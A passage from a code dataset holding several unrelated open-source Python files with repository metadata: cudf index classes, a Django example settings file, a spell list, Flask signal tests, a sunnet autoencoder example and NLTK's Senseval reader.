return dlpack.to_dlpack(self)
@property
def gpu_values(self):
return self.as_column().to_gpu_array()
def min(self):
return self.as_column().min()
def max(self):
return self.as_column().max()
def sum(self):
return self.as_column().sum()
def find_segments(self):
"""Return the beginning index for segments
Returns
-------
result : NumericalColumn
"""
segments, _ = self._find_segments()
return segments
def _find_segments(self):
seg, markers = cudautils.find_segments(self.gpu_values)
return NumericalColumn(data=Buffer(seg), dtype=seg.dtype), markers
@classmethod
def _concat(cls, objs):
data = Column._concat([o.as_column() for o in objs])
return as_index(data)
def _apply_op(self, fn, other=None):
from cudf.dataframe.series import Series
idx_series = Series(self, name=self.name)
op = getattr(idx_series, fn)
if other is not None:
return as_index(op(other))
else:
return as_index(op())
def __add__(self, other):
return self._apply_op("__add__", other)
def __radd__(self, other):
return self._apply_op("__radd__", other)
def __sub__(self, other):
return self._apply_op("__sub__", other)
def __rsub__(self, other):
return self._apply_op("__rsub__", other)
def __mul__(self, other):
return self._apply_op("__mul__", other)
def __rmul__(self, other):
return self._apply_op("__rmul__", other)
def __mod__(self, other):
return self._apply_op("__mod__", other)
def __rmod__(self, other):
return self._apply_op("__rmod__", other)
def __pow__(self, other):
return self._apply_op("__pow__", other)
def __floordiv__(self, other):
return self._apply_op("__floordiv__", other)
def __rfloordiv__(self, other):
return self._apply_op("__rfloordiv__", other)
def __truediv__(self, other):
return self._apply_op("__truediv__", other)
def __rtruediv__(self, other):
return self._apply_op("__rtruediv__", other)
__div__ = __truediv__
def __and__(self, other):
return self._apply_op("__and__", other)
def __or__(self, other):
return self._apply_op("__or__", other)
def __xor__(self, other):
return self._apply_op("__xor__", other)
def __eq__(self, other):
return self._apply_op("__eq__", other)
def __ne__(self, other):
return self._apply_op("__ne__", other)
def __lt__(self, other):
return self._apply_op("__lt__", other)
def __le__(self, other):
return self._apply_op("__le__", other)
def __gt__(self, other):
return self._apply_op("__gt__", other)
def __ge__(self, other):
return self._apply_op("__ge__", other)
def equals(self, other):
if self is other:
return True
if len(self) != len(other):
return False
elif len(self) == 1:
val = self[0] == other[0]
# when self is multiindex we need to checkall
if isinstance(val, np.ndarray):
return val.all()
return bool(val)
else:
result = self == other
if isinstance(result, bool):
return result
else:
return result._values.all()
def join(self, other, method, how="left", return_indexers=False):
column_join_res = self.as_column().join(
other.as_column(),
how=how,
return_indexers=return_indexers,
method=method,
)
if return_indexers:
joined_col, indexers = column_join_res
joined_index = as_index(joined_col)
return joined_index, indexers
else:
return column_join_res
def rename(self, name):
"""
Alter Index name.
Defaults to returning new index.
Parameters
----------
name : label
Name(s) to set.
Returns
-------
Index
Difference from pandas:
* Not supporting: inplace
"""
out = self.copy(deep=False)
out.name = name
return out.copy(deep=True)
def astype(self, dtype):
"""Convert to the given ``dtype``.
Returns
-------
If the dtype changed, a new ``Index`` is returned by casting each
values to the given dtype.
If the dtype is not changed, ``self`` is returned.
"""
if dtype == self.dtype:
return self
return as_index(self._values.astype(dtype), name=self.name)
def to_array(self, fillna=None):
"""Get a dense numpy array for the data.
Parameters
----------
fillna : str or None
Defaults to None, which will skip null values.
If it equals "pandas", null values are filled with NaNs.
Non integral dtype is promoted to np.float64.
Notes
-----
if ``fillna`` is ``None``, null values are skipped. Therefore, the
output size could be smaller.
"""
return self._values.to_array(fillna=fillna)
def to_series(self):
from cudf.dataframe.series import Series
return Series(self._values)
@property
def loc(self):
return _IndexLocIndexer(self)
@property
def is_unique(self):
raise (NotImplementedError)
@property
def is_monotonic(self):
return self.is_monotonic_increasing
@property
def is_monotonic_increasing(self):
raise (NotImplementedError)
@property
def is_monotonic_decreasing(self):
raise (NotImplementedError)
def get_slice_bound(self, label, side, kind):
raise (NotImplementedError)
class RangeIndex(Index):
"""An iterable integer index defined by a starting value and ending value.
Can be sliced and indexed arbitrarily without allocating memory for the
complete structure.
Properties
---
_start: The first value
_stop: The last value
name: Name of the index
"""
def __init__(self, start, stop=None, name=None):
"""RangeIndex(size), RangeIndex(start, stop)
Parameters
----------
start, stop: int
name: string
"""
if isinstance(start, range):
therange = start
start = therange.start
stop = therange.stop
if stop is None:
start, stop = 0, start
self._start = int(start)
self._stop = int(stop)
self.name = name
def copy(self, deep=True):
if deep:
result = deepcopy(self)
else:
result = copy(self)
result.name = self.name
return result
def __repr__(self):
return (
"{}(start={}, stop={}".format(
self.__class__.__name__, self._start, self._stop
)
+ (
", name='{}'".format(str(self.name))
if self.name is not None
else ""
)
+ ")"
)
def __len__(self):
return max(0, self._stop - self._start)
def __getitem__(self, index):
if isinstance(index, slice):
start, stop, step, sln = utils.standard_python_slice(
len(self), index
)
start += self._start
stop += self._start
if sln == 0:
return RangeIndex(0)
else:
return index_from_range(start, stop, step)
elif isinstance(index, int):
index = utils.normalize_index(index, len(self))
index += self._start
return index
elif isinstance(index, (list, np.ndarray)):
index = np.array(index)
index = rmm.to_device(index)
if isinstance(index, (DeviceNDArray)):
return self.take(index)
else:
raise ValueError(index)
def __eq__(self, other):
return super(type(self), self).__eq__(other)
def equals(self, other):
if self is other:
return True
if len(self) != len(other):
return False
if isinstance(other, cudf.dataframe.index.RangeIndex):
return self._start == other._start and self._stop == other._stop
else:
return (self == other)._values.all()
@property
def dtype(self):
return np.dtype(np.int64)
@property
def _values(self):
return self.as_column()
@property
def is_contiguous(self):
return True
@property
def size(self):
return max(0, self._stop - self._start)
def find_label_range(self, first, last):
# clip first to range
if first is None or first < self._start:
begin = self._start
elif first < self._stop:
begin = first
else:
begin = self._stop
# clip last to range
if last is None:
end = self._stop
elif last < self._start:
end = begin
elif last < self._stop:
end = last + 1
else:
end = self._stop
# shift to index
return begin - self._start, end - self._start
def as_column(self):
if len(self) > 0:
vals = cudautils.arange(self._start, self._stop, dtype=self.dtype)
else:
vals = rmm.device_array(0, dtype=self.dtype)
return NumericalColumn(data=Buffer(vals), dtype=vals.dtype)
def to_gpu_array(self):
return self.as_column().to_gpu_array()
def to_pandas(self):
return pd.RangeIndex(
start=self._start,
stop=self._stop,
dtype=self.dtype,
name=self.name,
)
@property
def is_unique(self):
return True
@property
def is_monotonic_increasing(self):
return self._start <= self._stop
@property
def is_monotonic_decreasing(self):
return self._start >= self._stop
def get_slice_bound(self, label, side, kind):
# TODO: Range-specific implementation here
raise (NotImplementedError)
def index_from_range(start, stop=None, step=None):
vals = cudautils.arange(start, stop, step, dtype=np.int64)
return as_index(vals)
class GenericIndex(Index):
"""An array of orderable values that represent the indices of another Column
Attributes
---
_values: A Column object
name: A string
"""
def __init__(self, values, name=None):
from cudf.dataframe.series import Series
# normalize the input
if isinstance(values, Series):
name = values.name
values = values._column
elif isinstance(values, columnops.TypedColumnBase):
values = values
else:
if isinstance(values, (list, tuple)):
if len(values) == 0:
values = np.asarray([], dtype="int64")
else:
values = np.asarray(values)
values = columnops.as_column(values)
assert isinstance(values, (NumericalColumn, StringColumn))
assert isinstance(values, columnops.TypedColumnBase), type(values)
self._values = values
self.name = name
def copy(self, deep=True):
if deep:
result = deepcopy(self)
else:
result = copy(self)
result._values = self._values.copy(deep)
result.name = self.name
return result
def serialize(self, serialize):
header = {}
header["payload"], frames = serialize(self._values)
header["frame_count"] = len(frames)
return header, frames
@classmethod
def deserialize(cls, deserialize, header, frames):
payload = deserialize(
header["payload"], frames[: header["frame_count"]]
)
return cls(payload)
def __sizeof__(self):
return self._values.__sizeof__()
def __reduce__(self):
return self.__class__, tuple([self._values])
def __len__(self):
return len(self._values)
def __repr__(self):
vals = [self._values[i] for i in range(min(len(self), 10))]
return (
"{}({}, dtype={}".format(
self.__class__.__name__, vals, self._values.dtype
)
+ (
", name='{}'".format(self.name)
if self.name is not None
else ""
)
+ ")"
)
def __getitem__(self, index):
res = self._values[index]
if not isinstance(index, int):
return as_index(res)
else:
return res
def as_column(self):
"""Convert the index as a Series.
"""
return self._values
@property
def dtype(self):
return self._values.dtype
def find_label_range(self, first, last):
"""Find range that starts with *first* and ends with *last*,
inclusively.
Returns
-------
begin, end : 2-tuple of int
The starting index and the ending index.
The *last* value occurs at ``end - 1`` position.
"""
col = self._values
begin, end = None, None
if first is not None:
begin = col.find_first_value(first)
if last is not None:
end = col.find_last_value(last)
end += 1
return begin, end
@property
def is_unique(self):
return self._values.is_unique
@property
def is_monotonic(self):
return self._values.is_monotonic
@property
def is_monotonic_increasing(self):
return self._values.is_monotonic_increasing
@property
def is_monotonic_decreasing(self):
return self._values.is_monotonic_decreasing
def get_slice_bound(self, label, side, kind):
return self._values.get_slice_bound(label, side, kind)
class DatetimeIndex(GenericIndex):
# TODO this constructor should take a timezone or something to be
# consistent with pandas
def __init__(self, values, name=None):
# we should be more strict on what we accept here but
# we'd have to go and figure out all the semantics around
# pandas dtindex creation first which. For now
# just make sure we handle np.datetime64 arrays
# and then just dispatch upstream
if name is None and hasattr(values, "name"):
name = values.name
if isinstance(values, np.ndarray) and values.dtype.kind == "M":
values = DatetimeColumn.from_numpy(values)
elif isinstance(values, pd.DatetimeIndex):
values = DatetimeColumn.from_numpy(values.values)
elif isinstance(values, (list, tuple)):
values = DatetimeColumn.from_numpy(
np.array(values, dtype="<M8[ms]")
)
assert values.null_count == 0
self._values = values
self.name = name
@property
def year(self):
return self.get_dt_field("year")
@property
def month(self):
return self.get_dt_field("month")
@property
def day(self):
return self.get_dt_field("day")
@property
def hour(self):
return self.get_dt_field("hour")
@property
def minute(self):
return self.get_dt_field("minute")
@property
def second(self):
return self.get_dt_field("second")
def get_dt_field(self, field):
out_column = self._values.get_dt_field(field)
# columnops.column_empty_like always returns a Column object
# but we need a NumericalColumn for GenericIndex..
# how should this be handled?
out_column = NumericalColumn(
data=out_column.data,
mask=out_column.mask,
null_count=out_column.null_count,
dtype=out_column.dtype,
name=self.name,
)
return as_index(out_column)
class CategoricalIndex(GenericIndex):
"""An categorical of orderable values that represent the indices of another
Column
Attributes
---
_values: A CategoricalColumn object
name: A string
"""
def __init__(self, values, name=None):
if isinstance(values, CategoricalColumn):
values = values
elif isinstance(
values, pd.Series
) and pd.api.types.is_categorical_dtype(values.dtype):
values = CategoricalColumn(
data=Buffer(values.cat.codes.values),
categories=values.cat.categories,
ordered=values.cat.ordered,
)
elif isinstance(values, (pd.Categorical, pd.CategoricalIndex)):
values = CategoricalColumn(
data=Buffer(values.codes),
categories=values.categories,
ordered=values.ordered,
)
elif isinstance(values, (list, tuple)):
values = columnops.as_column(
pd.Categorical(values, categories=values)
)
assert values.null_count == 0
self._values = values
self.name = name
self.names = [name]
@property
def codes(self):
return self._values.codes
@property
def categories(self):
return self._values.cat().categories
class StringIndex(GenericIndex):
"""String defined indices into another Column
Attributes
---
_values: A StringColumn object or NDArray of strings
name: A string
"""
def __init__(self, values, name=None):
if isinstance(values, StringColumn):
self._values = values.copy()
elif isinstance(values, StringIndex):
if name is None:
name = values.name
self._values = values._values.copy()
else:
self._values = columnops.build_column(
nvstrings.to_device(values), dtype="object"
)
assert self._values.null_count == 0
self.name = name
@property
def codes(self):
return self._values.codes
@property
def categories(self):
return self._values.categories
def to_pandas(self):
result = pd.Index(self.values, name=self.name, dtype="object")
return result
def take(self, indices):
return columnops.as_column(self._values).element_indexing(indices)
def __repr__(self):
return (
"{}({}, dtype='object'".format(
self.__class__.__name__, self._values.to_array()
)
+ (
", name='{}'".format(self.name)
if self.name is not None
else ""
)
+ ")"
)
def as_index(arbitrary, name=None):
"""Create an Index from an arbitrary object
Currently supported inputs are:
* ``Column``
* ``Buffer``
* ``Series``
* ``Index``
* numba device array
* numpy array
* pyarrow array
* pandas.Categorical
Returns
-------
result : subclass of Index
- CategoricalIndex for Categorical input.
- DatetimeIndex for Datetime input.
- GenericIndex for all other inputs.
"""
# This function should probably be moved to Index.__new__
if hasattr(arbitrary, "name") and name is None:
name = arbitrary.name
if isinstance(arbitrary, Index):
return arbitrary.rename(name=name)
elif isinstance(arbitrary, NumericalColumn):
return GenericIndex(arbitrary, name=name)
elif isinstance(arbitrary, StringColumn):
return StringIndex(arbitrary, name=name)
elif isinstance(arbitrary, DatetimeColumn):
return DatetimeIndex(arbitrary, name=name)
elif isinstance(arbitrary, CategoricalColumn):
return CategoricalIndex(arbitrary, name=name)
else:
return as_index(columnops.as_column(arbitrary), name=name)
register_distributed_serializer(RangeIndex)
register_distributed_serializer(GenericIndex)
register_distributed_serializer(DatetimeIndex)
register_distributed_serializer(CategoricalIndex)
| 27.989183
| 80
| 0.594366
|
f43bec8358669f7090ff3ebc99c1b92215e56635
| 2,084
|
py
|
Python
|
example/example/settings.py
|
TargetHolding/django-ladon
|
3e454e4e3a6487a5a90fe35894b9a1fe7e4c47d5
|
[
"MIT"
] | 2
|
2015-10-20T05:54:49.000Z
|
2017-03-22T17:39:28.000Z
|
example/example/settings.py
|
TargetHolding/django-ladon
|
3e454e4e3a6487a5a90fe35894b9a1fe7e4c47d5
|
[
"MIT"
] | null | null | null |
example/example/settings.py
|
TargetHolding/django-ladon
|
3e454e4e3a6487a5a90fe35894b9a1fe7e4c47d5
|
[
"MIT"
] | null | null | null |
"""
Django settings for example project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')i+o9r4)#r%xr@p1s=^79n3o+9hat@cluxhp-bjkora(x#_ixa'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'calculator',
'django_ladon',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'example.urls'
WSGI_APPLICATION = 'example.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
| 23.954023
| 71
| 0.732726
|
ca6bb02550ea56037df04acfd6ec66d59d777f85
| 2,154
|
py
|
Python
|
potterscript/spells.py
|
madreains/OrkoHunter
|
ab8b9e3e9323a4a26a12f6d057f953f9a685f724
|
[
"MIT"
] | 16
|
2016-05-09T06:24:38.000Z
|
2021-06-29T02:28:05.000Z
|
potterscript/spells.py
|
madreains/OrkoHunter
|
ab8b9e3e9323a4a26a12f6d057f953f9a685f724
|
[
"MIT"
] | 3
|
2016-05-09T20:50:36.000Z
|
2017-05-29T11:02:19.000Z
|
potterscript/spells.py
|
madreains/OrkoHunter
|
ab8b9e3e9323a4a26a12f6d057f953f9a685f724
|
[
"MIT"
] | 3
|
2016-05-09T20:03:05.000Z
|
2020-11-23T08:29:00.000Z
|
import random
def gen_random():
index = random.randint(0, len(spells) - 1)
return spells[index]
spells = ('Accio',
'Aguamenti',
'Alohomora',
'Anapneo',
'Aparecium',
'Avada Kedavra',
'Avis',
'Capacious Extremis',
'Cave Inimicum',
'Colloportus',
'Confringo',
'Confundo',
'Crucio',
'Defodio',
'Deletrius',
'Densaugeo',
'Deprimo',
'Descendo',
'Diffindo',
'Duro',
'Engorgio',
'Episkey',
'Erecto',
'Evanesco',
'Expecto Patronum',
'Expelliarmus',
'Expulso',
'Ferula',
'Finite Incantatem',
'Flagrate',
'Furnunculus',
'Geminio',
'Glisseo',
'Homenum Revelio',
'Impedimenta',
'Imperio',
'Impervius',
'Incarcerous',
'Incendio',
'Langlock',
'Legilimens',
'Levicorpus',
'Liberacorpus',
'Locomotor',
'Locomotor Mortis',
'Lumos',
'Meteolojinx Recanto',
'Mobiliarbus',
'Mobilicorpus',
'Morsmordre',
'Muffliato',
'Nox',
'Obliviate',
'Obscuro',
'Oppugno',
'Orchideous',
'Pack',
'Petrificus Totalus',
'Piertotum Locomotor',
'Point Me',
'Portus',
'Prior Incantato',
'Protego',
'Protego Horribilis',
'Protego Totalum',
'Quietus',
'Reducio',
'Reducto',
'Relashio',
'Rennervate',
'Reparo',
'Repello Muggletum',
'Rictusempra',
'Riddikulus',
'Salvio Hexia',
'Scourgify',
'Sectumsempra',
'Serpensortia',
'Silencio',
'Sonorus',
'Specialis Revelio',
'Stupefy',
'Tarantallegra',
'Tergeo',
'Waddiwasi',
'Wingardium Leviosa')
| 23.16129
| 46
| 0.41922
|
45ca45d9bf7d8bf00fa945c0610794f4e0248b95
| 4,806
|
py
|
Python
|
flask/testsuite/signals.py
|
coolinzhong/flask
|
29f3a1ac237f75ca9f330a3c285a5a4d12b0dadb
|
[
"BSD-3-Clause"
] | 33
|
2015-03-17T16:04:16.000Z
|
2020-10-26T06:12:30.000Z
|
flask/testsuite/signals.py
|
tladudtn/flask
|
35f106643c41387a4304b4fe95729c678f429c23
|
[
"BSD-3-Clause"
] | 19
|
2015-03-03T07:56:39.000Z
|
2020-01-22T15:06:38.000Z
|
flask/testsuite/signals.py
|
tladudtn/flask
|
35f106643c41387a4304b4fe95729c678f429c23
|
[
"BSD-3-Clause"
] | 64
|
2015-01-19T06:06:00.000Z
|
2022-01-20T01:09:35.000Z
|
# -*- coding: utf-8 -*-
"""
flask.testsuite.signals
~~~~~~~~~~~~~~~~~~~~~~~
Signalling.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import flask
import unittest
from flask.testsuite import FlaskTestCase
class SignalsTestCase(FlaskTestCase):
def test_template_rendered(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.render_template('simple_template.html', whiskey=42)
recorded = []
def record(sender, template, context):
recorded.append((template, context))
flask.template_rendered.connect(record, app)
try:
app.test_client().get('/')
self.assert_equal(len(recorded), 1)
template, context = recorded[0]
self.assert_equal(template.name, 'simple_template.html')
self.assert_equal(context['whiskey'], 42)
finally:
flask.template_rendered.disconnect(record, app)
def test_request_signals(self):
app = flask.Flask(__name__)
calls = []
def before_request_signal(sender):
calls.append('before-signal')
def after_request_signal(sender, response):
self.assert_equal(response.data, b'stuff')
calls.append('after-signal')
@app.before_request
def before_request_handler():
calls.append('before-handler')
@app.after_request
def after_request_handler(response):
calls.append('after-handler')
response.data = 'stuff'
return response
@app.route('/')
def index():
calls.append('handler')
return 'ignored anyway'
flask.request_started.connect(before_request_signal, app)
flask.request_finished.connect(after_request_signal, app)
try:
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'stuff')
self.assert_equal(calls, ['before-signal', 'before-handler',
'handler', 'after-handler',
'after-signal'])
finally:
flask.request_started.disconnect(before_request_signal, app)
flask.request_finished.disconnect(after_request_signal, app)
def test_request_exception_signal(self):
app = flask.Flask(__name__)
recorded = []
@app.route('/')
def index():
1 // 0
def record(sender, exception):
recorded.append(exception)
flask.got_request_exception.connect(record, app)
try:
self.assert_equal(app.test_client().get('/').status_code, 500)
self.assert_equal(len(recorded), 1)
self.assert_true(isinstance(recorded[0], ZeroDivisionError))
finally:
flask.got_request_exception.disconnect(record, app)
def test_appcontext_signals(self):
app = flask.Flask(__name__)
recorded = []
def record_push(sender, **kwargs):
recorded.append('push')
def record_pop(sender, **kwargs):
recorded.append('pop')
@app.route('/')
def index():
return 'Hello'
flask.appcontext_pushed.connect(record_push, app)
flask.appcontext_popped.connect(record_pop, app)
try:
with app.test_client() as c:
rv = c.get('/')
self.assert_equal(rv.data, b'Hello')
self.assert_equal(recorded, ['push'])
self.assert_equal(recorded, ['push', 'pop'])
finally:
flask.appcontext_pushed.disconnect(record_push, app)
flask.appcontext_popped.disconnect(record_pop, app)
def test_flash_signal(self):
app = flask.Flask(__name__)
app.config['SECRET_KEY'] = 'secret'
@app.route('/')
def index():
flask.flash('This is a flash message', category='notice')
return flask.redirect('/other')
recorded = []
def record(sender, message, category):
recorded.append((message, category))
flask.message_flashed.connect(record, app)
try:
client = app.test_client()
with client.session_transaction():
client.get('/')
self.assert_equal(len(recorded), 1)
message, category = recorded[0]
self.assert_equal(message, 'This is a flash message')
self.assert_equal(category, 'notice')
finally:
flask.message_flashed.disconnect(record, app)
def suite():
suite = unittest.TestSuite()
if flask.signals_available:
suite.addTest(unittest.makeSuite(SignalsTestCase))
return suite
| 31.207792
| 76
| 0.584062
|
72eb32c963e2a6ca7f62d4f356945631ea7c35e6
| 1,803
|
py
|
Python
|
example/autoEncoder/python_example.py
|
Tyill/skynet
|
1a34fc27b523345603d4fb88570f44fbbbef1b80
|
[
"MIT"
] | 64
|
2018-10-14T16:36:05.000Z
|
2021-03-22T10:20:07.000Z
|
example/autoEncoder/python_example.py
|
Tyill/sunnet
|
1a34fc27b523345603d4fb88570f44fbbbef1b80
|
[
"MIT"
] | 4
|
2018-10-15T05:52:01.000Z
|
2020-04-01T14:41:54.000Z
|
example/autoEncoder/python_example.py
|
Tyill/sunnet
|
1a34fc27b523345603d4fb88570f44fbbbef1b80
|
[
"MIT"
] | 20
|
2018-10-14T18:29:15.000Z
|
2020-10-22T23:03:59.000Z
|
import os
from libsunnetimport*
import numpy as np
import imageio
import random
import ctypes
import datetime
# create net
net = snNet.Net()
net.addNode('In', snOperator.Input(), 'FC1') \
.addNode('FC1', snOperator.FullyConnected(256), 'FC2') \
.addNode('FC2', snOperator.FullyConnected(128), 'FC3') \
.addNode('FC3', snOperator.FullyConnected(32), 'FC4') \
.addNode('FC4', snOperator.FullyConnected(128), 'FC5') \
.addNode('FC5', snOperator.FullyConnected(256), 'FC6') \
.addNode('FC6', snOperator.FullyConnected(784), 'LS') \
.addNode('LS', snOperator.LossFunction(snType.lossType.binaryCrossEntropy), 'Output')
# load of weight
#if (net.loadAllWeightFromFile('c:/cpp/w.dat')):
# print('weight is load')
#else:
# print('error load weight')
# loadImg
imgList = []
pathImg = 'c:\\cpp\\sunnet\\example\\autoEncoder\\images\\'
for i in range(10):
imgList.append(os.listdir(pathImg + str(i)))
bsz = 100
lr = 0.001
accuratSumm = 0.
inLayer = np.zeros((bsz, 1, 28, 28), ctypes.c_float)
outLayer = np.zeros((bsz, 1, 1, 28 * 28), ctypes.c_float)
imgMem = {}
# cycle lern
for n in range(1000):
for i in range(bsz):
ndir = random.randint(0, 10 - 1)
nimg = random.randint(0, len(imgList[ndir]) - 1)
nm = pathImg + str(ndir) + '/' + imgList[ndir][nimg]
if (nm in imgMem):
inLayer[i][0] = imgMem[nm]
else:
inLayer[i][0] = imageio.imread(nm)
imgMem[nm] = inLayer[i][0].copy()
acc = [0]
net.training(lr, inLayer, outLayer, inLayer, acc)
accuratSumm += acc[0]/bsz
print(datetime.datetime.now().strftime('%H:%M:%S'), n, "accurate", accuratSumm / (n + 1))
# save weight
if (net.saveAllWeightToFile('c:/cpp/w.dat')):
print('weight is save')
else:
print('error save weight')
| 26.910448
| 93
| 0.632834
|
6ac715cf3ad5a38eceb0a835c2fb44d490a5d142
| 8,019
|
py
|
Python
|
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/corpus/reader/senseval.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/corpus/reader/senseval.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
pkgs/nltk-3.2-py27_0/lib/python2.7/site-packages/nltk/corpus/reader/senseval.py
|
wangyum/anaconda
|
6e5a0dbead3327661d73a61e85414cf92aa52be6
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# Natural Language Toolkit: Senseval 2 Corpus Reader
#
# Copyright (C) 2001-2015 NLTK Project
# Author: Trevor Cohn <tacohn@cs.mu.oz.au>
# Steven Bird <stevenbird1@gmail.com> (modifications)
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Read from the Senseval 2 Corpus.
SENSEVAL [http://www.senseval.org/]
Evaluation exercises for Word Sense Disambiguation.
Organized by ACL-SIGLEX [http://www.siglex.org/]
Prepared by Ted Pedersen <tpederse@umn.edu>, University of Minnesota,
http://www.d.umn.edu/~tpederse/data.html
Distributed with permission.
The NLTK version of the Senseval 2 files uses well-formed XML.
Each instance of the ambiguous words "hard", "interest", "line", and "serve"
is tagged with a sense identifier, and supplied with context.
"""
from __future__ import print_function, unicode_literals
import re
from xml.etree import ElementTree
from nltk import compat
from nltk.tokenize import *
from nltk.corpus.reader.util import *
from nltk.corpus.reader.api import *
@compat.python_2_unicode_compatible
class SensevalInstance(object):
def __init__(self, word, position, context, senses):
self.word = word
self.senses = tuple(senses)
self.position = position
self.context = context
def __repr__(self):
return ('SensevalInstance(word=%r, position=%r, '
'context=%r, senses=%r)' %
(self.word, self.position, self.context, self.senses))
class SensevalCorpusReader(CorpusReader):
def instances(self, fileids=None):
return concat([SensevalCorpusView(fileid, enc)
for (fileid, enc) in self.abspaths(fileids, True)])
def raw(self, fileids=None):
"""
:return: the text contents of the given fileids, as a single string.
"""
if fileids is None: fileids = self._fileids
elif isinstance(fileids, compat.string_types): fileids = [fileids]
return concat([self.open(f).read() for f in fileids])
def _entry(self, tree):
elts = []
for lexelt in tree.findall('lexelt'):
for inst in lexelt.findall('instance'):
sense = inst[0].attrib['senseid']
context = [(w.text, w.attrib['pos'])
for w in inst[1]]
elts.append( (sense, context) )
return elts
class SensevalCorpusView(StreamBackedCorpusView):
def __init__(self, fileid, encoding):
StreamBackedCorpusView.__init__(self, fileid, encoding=encoding)
self._word_tokenizer = WhitespaceTokenizer()
self._lexelt_starts = [0] # list of streampos
self._lexelts = [None] # list of lexelt names
def read_block(self, stream):
# Decide which lexical element we're in.
lexelt_num = bisect.bisect_right(self._lexelt_starts, stream.tell())-1
lexelt = self._lexelts[lexelt_num]
instance_lines = []
in_instance = False
while True:
line = stream.readline()
if line == '':
assert instance_lines == []
return []
# Start of a lexical element?
if line.lstrip().startswith('<lexelt'):
lexelt_num += 1
m = re.search('item=("[^"]+"|\'[^\']+\')', line)
assert m is not None # <lexelt> has no 'item=...'
lexelt = m.group(1)[1:-1]
if lexelt_num < len(self._lexelts):
assert lexelt == self._lexelts[lexelt_num]
else:
self._lexelts.append(lexelt)
self._lexelt_starts.append(stream.tell())
# Start of an instance?
if line.lstrip().startswith('<instance'):
assert instance_lines == []
in_instance = True
# Body of an instance?
if in_instance:
instance_lines.append(line)
# End of an instance?
if line.lstrip().startswith('</instance'):
xml_block = '\n'.join(instance_lines)
xml_block = _fixXML(xml_block)
inst = ElementTree.fromstring(xml_block)
return [self._parse_instance(inst, lexelt)]
def _parse_instance(self, instance, lexelt):
senses = []
context = []
position = None
for child in instance:
if child.tag == 'answer':
senses.append(child.attrib['senseid'])
elif child.tag == 'context':
context += self._word_tokenizer.tokenize(child.text)
for cword in child:
if cword.tag == 'compound':
cword = cword[0] # is this ok to do?
if cword.tag == 'head':
# Some santiy checks:
assert position is None, 'head specified twice'
assert cword.text.strip() or len(cword)==1
assert not (cword.text.strip() and len(cword)==1)
# Record the position of the head:
position = len(context)
# Addd on the head word itself:
if cword.text.strip():
context.append(cword.text.strip())
elif cword[0].tag == 'wf':
context.append((cword[0].text,
cword[0].attrib['pos']))
if cword[0].tail:
context += self._word_tokenizer.tokenize(
cword[0].tail)
else:
assert False, 'expected CDATA or wf in <head>'
elif cword.tag == 'wf':
context.append((cword.text, cword.attrib['pos']))
elif cword.tag == 's':
pass # Sentence boundary marker.
else:
print('ACK', cword.tag)
assert False, 'expected CDATA or <wf> or <head>'
if cword.tail:
context += self._word_tokenizer.tokenize(cword.tail)
else:
assert False, 'unexpected tag %s' % child.tag
return SensevalInstance(lexelt, position, context, senses)
def _fixXML(text):
"""
Fix the various issues with Senseval pseudo-XML.
"""
# <~> or <^> => ~ or ^
text = re.sub(r'<([~\^])>', r'\1', text)
# fix lone &
text = re.sub(r'(\s+)\&(\s+)', r'\1&\2', text)
# fix """
text = re.sub(r'"""', '\'"\'', text)
# fix <s snum=dd> => <s snum="dd"/>
text = re.sub(r'(<[^<]*snum=)([^">]+)>', r'\1"\2"/>', text)
# fix foreign word tag
text = re.sub(r'<\&frasl>\s*<p[^>]*>', 'FRASL', text)
# remove <&I .>
text = re.sub(r'<\&I[^>]*>', '', text)
# fix <{word}>
text = re.sub(r'<{([^}]+)}>', r'\1', text)
# remove <@>, <p>, </p>
text = re.sub(r'<(@|/?p)>', r'', text)
# remove <&M .> and <&T .> and <&Ms .>
text = re.sub(r'<&\w+ \.>', r'', text)
# remove <!DOCTYPE... > lines
text = re.sub(r'<!DOCTYPE[^>]*>', r'', text)
# remove <[hi]> and <[/p]> etc
text = re.sub(r'<\[\/?[^>]+\]*>', r'', text)
# take the thing out of the brackets: <…>
text = re.sub(r'<(\&\w+;)>', r'\1', text)
# and remove the & for those patterns that aren't regular XML
